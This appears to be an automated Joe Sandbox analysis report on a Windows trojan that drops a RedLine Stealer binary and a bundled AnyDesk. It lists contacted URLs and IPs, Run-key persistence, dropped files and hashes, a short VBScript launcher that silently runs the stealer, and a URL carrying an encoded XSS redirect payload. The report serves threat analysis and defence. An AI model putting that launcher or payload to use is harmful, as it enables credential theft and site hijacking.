                                                                                                                                                                        https://support.anydesk.com/knowledge/quick-start-guide%AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://tempuri.org/Entity/Id13Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://tempuri.org/Entity/Id12ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Committedgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://anydesk.com/en/assembly/termsAnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://support.anydesk.com/knowledge/quick-start-guide4AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertygg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://support.anydesk.comAnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://support.anydesk.com/knowledge/waiting-for-image-black-screenAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id7ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.229.191.44 | boot.net.anydesk.com | Czech Republic | 60068 | CDN77GB | false
67.203.7.148 | unknown | United States | 21769 | AS-COLOAMUS | true
64.31.23.26 | relay-6a630189.net.anydesk.com | United States | 46475 | LIMESTONENETWORKSUS | false
18.173.219.85 | unknown | United States | 3 | MIT-GATEWAYSUS | false
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1402122
Start date and time:2024-03-03 13:31:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:28
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:SysrI6zSkJ.exe
renamed because original name is a hash value
Original Sample Name:2e501240ec8b9aab46d76a6504e44882.exe
Detection:MAL
Classification:mal76.troj.spyw.evad.winEXE@39/13@3/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 58%
• Number of executed functions: 294
• Number of non-executed functions: 152
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SysrI6zSkJ.exe, PID 6472 because it is empty
• Execution Graph export aborted for target embedded.exe, PID 6904 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: SysrI6zSkJ.exe
Time | Type | Description
12:31:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Repository C:\ProgramData\WinNet\gg.exe
12:32:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Repository C:\ProgramData\WinNet\gg.exe
13:32:02 | API Interceptor | 2x Sleep call for process: AnyDesk.exe modified
13:32:06 | API Interceptor | 94x Sleep call for process: gg.exe modified
                                                                                                                                                                                                                            https://www.Sunfest.com/tickets?squadup-promo=sun24group-discountGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.177.17
                                                                                                                                                                                                                            https://nalders.uk/dq.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.167.3
                                                                                                                                                                                                                            http://www.sunfest.com/tickets?squadup-promo=sun24group-discountGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.177.17
                                                                                                                                                                                                                            http://optimalrebalancing.tkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.167.3
                                                                                                                                                                                                                            NZXT-CAM-Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 185.93.1.251
                                                                                                                                                                                                                            https://lp.vp4.me/tksfGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                                            • 89.187.177.17
                                                                                                                                                                                                                            https://www.webtoon.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.177.16
                                                                                                                                                                                                                            Setup (1).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.177.16
                                                                                                                                                                                                                            http://boomba.clubGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 156.146.36.23
                                                                                                                                                                                                                            AS-COLOAMUSIhlya7zz0r.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                            • 67.203.7.148
                                                                                                                                                                                                                            NEW ORDER.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                            • 67.207.161.253
                                                                                                                                                                                                                            GGBz0FS1z4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 185.195.214.9
                                                                                                                                                                                                                            bT5nWJkvh0.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 67.227.21.224
                                                                                                                                                                                                                            lEcx2N6LTK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 67.203.3.32
                                                                                                                                                                                                                            Bdk58TYebF.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 67.203.3.34
                                                                                                                                                                                                                            ZhhHfkNewm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 162.223.197.223
                                                                                                                                                                                                                            jklarm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 67.203.3.46
                                                                                                                                                                                                                            oZasOwbAre.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 185.195.214.9
                                                                                                                                                                                                                            cCYqRor5yC.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                                            • 67.207.161.208
                                                                                                                                                                                                                            LIMESTONENETWORKSUSSecuriteInfo.com.Program.Unwanted.5176.1954.19726.exeGet hashmaliciousHawkEye, PureLog Stealer, XmrigBrowse
                                                                                                                                                                                                                            • 64.31.10.46
                                                                                                                                                                                                                            SecuriteInfo.com.Program.Unwanted.5176.1954.19726.exeGet hashmaliciousHawkEye, Gocoder, PureLog Stealer, XmrigBrowse
                                                                                                                                                                                                                            • 64.31.10.46
                                                                                                                                                                                                                            D7iI17d3sE.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                            • 64.31.53.155
                                                                                                                                                                                                                            thDGuavXoD.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 192.169.92.236
                                                                                                                                                                                                                            http://cdn1.filmnewscd.xyzGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            • 64.31.37.217
                                                                                                                                                                                                                            ZDKv0w0UwA.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 69.162.86.89
                                                                                                                                                                                                                            https://k-e-v.no/?s=%22%2F%3C%2Fscript%3E%3Cscript%3Ewindow%5B%27location%27%5D%5B%27replace%27%5D%28%5B%27h%27%2C%27t%27%2C%27t%27%2C%27p%27%2C%27s%27%2C%27%3A%27%2C%27%2F%27%2C%27%2F%27%2C%27w%27%2C%27w%27%2C%27w%27%2C%27.%27%2C%27w%27%2C%27h%27%2C%27t%27%2C%27e%27%2C%27n%27%2C%27v%27%2C%27l%27%2C%27p%27%2C%27e%27%2C%27.%27%2C%27c%27%2C%27o%27%2C%27m%27%2C%27%2F%27%2C%27a%27%2C%27c%27%2C%27T%27%2C%27c%27%2C%27l%27%2C%272%27%2C%27k%27%2C%27T%27%2C%27m%27%2C%27P%27%2C%27S%27%2C%27J%27%2C%27i%27%2C%27_%27%2C%27L%27%2C%27d%27%2C%27_%27%2C%27m%27%2C%27h%27%2C%27p%27%2C%27L%27%2C%27w%27%2C%27y%27%2C%27Z%27%2C%27e%27%2C%27d%27%2C%27s%27%2C%27u%27%2C%27P%27%2C%27V%27%2C%27d%27%2C%275%27%2C%275%27%2C%27q%27%2C%27f%27%2C%27t%27%2C%27s%27%2C%272%27%2C%27r%27%2C%27Y%27%2C%27e%27%2C%27_%27%2C%27S%27%2C%27b%27%2C%27Q%27%2C%27X%27%2C%271%27%2C%27b%27%2C%27Z%27%2C%27F%27%2C%27Q%27%2C%27T%27%2C%27N%27%2C%27z%27%2C%27T%27%2C%271%27%2C%27A%27%2C%27s%27%2C%27c%27%2C%27d%27%2C%27I%27%2C%27I%27%2C%27X%27%2C%27G%27%2C%27w%27%2C%27i%27%2C%27c%27%2C%27D%27%2C%27t%27%2C%27e%27%2C%27y%27%2C%27V%27%2C%27V%27%2C%278%27%2C%27v%27%2C%27Z%27%2C%27E%27%2C%27f%27%2C%27f%27%2C%27Y%27%2C%27C%27%2C%27e%27%2C%27o%27%2C%27Y%27%2C%27X%27%2C%27g%27%2C%27~%27%2C%27~%27%5D%5B%27join%27%5D%28%27%27%29%29%2Cdocument%5B%27body%27%5D%5B%27style%27%5D%5B%27opacity%27%5D%3D0x0%3B%3C%2Fscript%3EGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 208.115.232.150
                                                                                                                                                                                                                            http://discord.cc/meuserdd8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 74.63.219.251
                                                                                                                                                                                                                            http://discord.cc/meuserdd8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 74.63.219.251
                                                                                                                                                                                                                            http://www.hermesjms.com/confluence/display/HJMS/InstallingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 69.162.95.6
Process: C:\ProgramData\WinNet\embedded.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5216584
Entropy (8bit): 7.999460832435841
Encrypted: true
SSDEEP: 98304:NzTZ3cINQscs0m++LNkT6OpwDGUUH57yvZ/49Mr8EO3QhA9Kq:Nzt3cINQscNmvLCwDkHEvZ/4R79x
MD5: A21768190F3B9FEAE33AAEF660CB7A83
SHA1: 24780657328783EF50AE0964B23288E68841A421
SHA-256: 55E4CE3FE726043070ECD7DE5A74B2459EA8BED19EF2A36CE7884B2AB0863047
SHA-512: CA6DA822072CB0D3797221E578780B19C8953E4207729A002A64A00CED134059C0ED21B02572C43924E4BA3930C0E88CD2CDB309259E3D0DCFB0C282F1832D62
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12371456
                                                                                                                                                                                                                                                Entropy (8bit):6.778870362417023
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:98304:kj1ZAxOCU3yUetDvB6ti3FOU8jRdqY9d2omTt20+NIZ:YAxOCU3yUetDvB6ti1aOTtlcIZ
                                                                                                                                                                                                                                                MD5:DB408CB75C1D0DA769C19A6CBBE60D87
                                                                                                                                                                                                                                                SHA1:76C93E7B38C9B1E17A3506B7527B3EFC4BAF76F5
                                                                                                                                                                                                                                                SHA-256:703D8767AEBE2DAEEA5525DA247CE23775F542C0621DF75CE436B95AAF21CE26
                                                                                                                                                                                                                                                SHA-512:8887125B1DE8969C8FFF3D601553400FA1DFE91E042DF7FB56A9074472839226E2B08289C70E2DA31C813CB8A1DEE59950B3DBDE9812131228A035525E652D84
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_EXEembeddedinBATfile, Description: Yara detected EXE embedded in BAT file, Source: C:\ProgramData\WinNet\embedded.exe, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):394240
                                                                                                                                                                                                                                                Entropy (8bit):6.700175464943679
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:Tv/ioKdMF+LZD/ZRj1vwWrrUFMNoz4pFGxjEB1NYAOrabN2GZvFcD7:Td+LZrNwWrrwMNoz4vG1OYZabtK7
                                                                                                                                                                                                                                                MD5:1CE7D5A1566C8C449D0F6772A8C27900
                                                                                                                                                                                                                                                SHA1:60854185F6338E1BFC7497FD41AA44C5C00D8F85
                                                                                                                                                                                                                                                SHA-256:73170761D6776C0DEBACFBBC61B6988CB8270A20174BF5C049768A264BB8FFAF
                                                                                                                                                                                                                                                SHA-512:7E3411BE8614170AE91DB1626C452997DC6DB663D79130872A124AF982EE1D457CEFBA00ABD7F5269ADCE3052403BE31238AECC3934C7379D224CB792D519753
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Project.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: LiveChat.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: LiveChat.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: anydesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: anydesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):304128
                                                                                                                                                                                                                                                Entropy (8bit):5.030148501932413
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:lqFFrqwIOGEzyJNmWb7cGaXSf0vdSP/HqlYuJTZFfuIMcZqf7D34teqiOLCbBOj:sBIOGFiifzHqlpJTZhWcZqf7DIXL
                                                                                                                                                                                                                                                MD5:20AB063F206EB8115FDE1479E05C245E
                                                                                                                                                                                                                                                SHA1:2088F3C51A5AD9E11DA999A7114623274CC69692
                                                                                                                                                                                                                                                SHA-256:5EC4818DA47F24AC8762BF73D0395662639142F86B930DB138E586C2EB91B29E
                                                                                                                                                                                                                                                SHA-512:2DC3181D57EE616C1BB5860D0007D06C04BA1A693064FE7044D9F07939E99E54E8B2864EBBB7268118784A691037DAD6756532BD149C74AEEDC993D0D0E4A0C5
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\ProgramData\WinNet\gg.exe, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):170
                                                                                                                                                                                                                                                Entropy (8bit):4.9082518346015584
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Zy0c74Wuj0c74Wm+m8nmKGc74WDQIUqF4R51GREfL4lDFnqJXRPc74WmTC:Zdc74Wpc74WCqXGc74WD/Uq88RqTPc7P
                                                                                                                                                                                                                                                MD5:3BA4CEBB444685D48F8B0DFD67C8390D
                                                                                                                                                                                                                                                SHA1:8B84E1821C39EC8658E603E498B07E08DDA2E6D1
                                                                                                                                                                                                                                                SHA-256:7F2BB84F63B47F35EE7EB70A35D35B81B63A7BCD39029CFB918FB6839F45A70C
                                                                                                                                                                                                                                                SHA-512:42B8271CD6343F7D75F4D5398370ED7D614C2250EA43531A9F19E80E5F0A339F6CC5EC565326CC6911B33BF872CEF9B860D72D8887573D92D5C7661C580A232E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:Dim WinScriptHost.Set WinScriptHost = CreateObject("WScript.Shell").WinScriptHost.Run Chr(34) & "C:\\ProgramData\\WinNet\\gg.exe" & Chr(34), 0.Set WinScriptHost = Nothing
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3094
                                                                                                                                                                                                                                                Entropy (8bit):5.33145931749415
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                                                MD5:2A56468A7C0F324A42EA599BF0511FAF
                                                                                                                                                                                                                                                SHA1:404B343A86EDEDF5B908D7359EB8AA957D1D4333
                                                                                                                                                                                                                                                SHA-256:6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
                                                                                                                                                                                                                                                SHA-512:19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):394240
                                                                                                                                                                                                                                                Entropy (8bit):6.700175464943679
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:Tv/ioKdMF+LZD/ZRj1vwWrrUFMNoz4pFGxjEB1NYAOrabN2GZvFcD7:Td+LZrNwWrrwMNoz4vG1OYZabtK7
                                                                                                                                                                                                                                                MD5:1CE7D5A1566C8C449D0F6772A8C27900
                                                                                                                                                                                                                                                SHA1:60854185F6338E1BFC7497FD41AA44C5C00D8F85
                                                                                                                                                                                                                                                SHA-256:73170761D6776C0DEBACFBBC61B6988CB8270A20174BF5C049768A264BB8FFAF
                                                                                                                                                                                                                                                SHA-512:7E3411BE8614170AE91DB1626C452997DC6DB663D79130872A124AF982EE1D457CEFBA00ABD7F5269ADCE3052403BE31238AECC3934C7379D224CB792D519753
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):30363
                                                                                                                                                                                                                                                Entropy (8bit):4.398900832719306
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:22mXHoYQzGtuZagRNV3625ProWV4Cg42cj:MXwb3T1uli
                                                                                                                                                                                                                                                MD5:1BAA2AB51B0FEDE34B655F39194B2103
                                                                                                                                                                                                                                                SHA1:329AD2EBE3450B63E12E720EE1A494AF47927733
                                                                                                                                                                                                                                                SHA-256:311E56D700DE167645000355BDD8C4A04BC9589022C8B4748C055503A23D7204
                                                                                                                                                                                                                                                SHA-512:0917317A0106E2C17BCCA76C7CEE9568800C74EC37CD15F8A1174C0CF9A48CBA91A9243E1C130FD098302E34ECED2A4403A4F2456202AA0969BB92A2A2297608
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview: * * * * * * * * * * * * * * * * * *.. info 2024-03-03 12:31:59.038 front 6256 6424 main - * AnyDesk Windows Startup *.. info 2024-03-03 12:31:59.038 front 6256 6424 main - * Version 8.0.8 ((detached head) 161cbc3269fd82431aba292c6ced1f1480f4964c).. info 2024-03-03 12:31:59.038 front 6256 6424 main - * Checksum 48544a05569c2af380b61b4f5af5a087.. info 2024-03-03 12:31:59.038 front 6256 6424 main - * Build 20240127190435.. info 2024-03-03 12:31:59.038 front 6256 6424 main - * Copyright (C) 2024 AnyDesk Software GmbH *.. info 2024-03-03 12:31:59.038 front 6256 6424 main - .. info 2024-03-03 12:31:59.038 front 6256 6424 main - Command Line params: C:\ProgramData\WinNet\AnyDesk.exe.. i
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1747)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2966
                                                                                                                                                                                                                                                Entropy (8bit):6.037942663803228
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:uISTAXYiD8U5Qtzfd/aP5vTbsNj2UgdhCRd/EQxD090BuAIEVJ/9fXzs0cp5Nr4B:uISTAIigbzfZaP5vTMEHCRRzDpbDs0Gs
                                                                                                                                                                                                                                                MD5:8BECE1F1429437E3BE836B3B4B76CBD4
                                                                                                                                                                                                                                                SHA1:BBA4554164EC750CD4F59D405DB72C09DD3522F0
                                                                                                                                                                                                                                                SHA-256:665836DD08279CFAB3D21545B49A2B3E5BBC56C02BB60E0E65D52DCF3AE0B1A3
                                                                                                                                                                                                                                                SHA-512:6C4BCF8A7F91649B0D7229929DB90235820AEECBDC6511D2B1B697D9E645404069FB3D72D5D998FDF1DF9A1056D7119E54F1EA86C57D3B0E4DD05A2D8CD5ACED
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):802
                                                                                                                                                                                                                                                Entropy (8bit):4.791365934579171
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:og0Z+xVAIi+m5sQx0R+iBs7sdi7lNqQHvWhQ44LroBGgFBG9LhhwOMcn:FJ+xo+iBsB5sAw34LtB9LhhwOMc
                                                                                                                                                                                                                                                MD5:1E4E1C0B6A4973A6E7F698C771A857A4
                                                                                                                                                                                                                                                SHA1:1E22F345695F7225F01EA3AC48E833086C73262F
                                                                                                                                                                                                                                                SHA-256:884E4669ED02A87F3E2D2EA464F7A4C70177775D0A7657C60383934903602446
                                                                                                                                                                                                                                                SHA-512:E8B3A794A11BF990EBFB633C39BCA4AC5759CA70F09A0F1AD32EDAAB8BE55C641D595BE927EA2A02E42D6BF3E235FB6F0684255023AA4F1EB0FE2978D0B04751
                                                                                                                                                                                                                                                Malicious:false
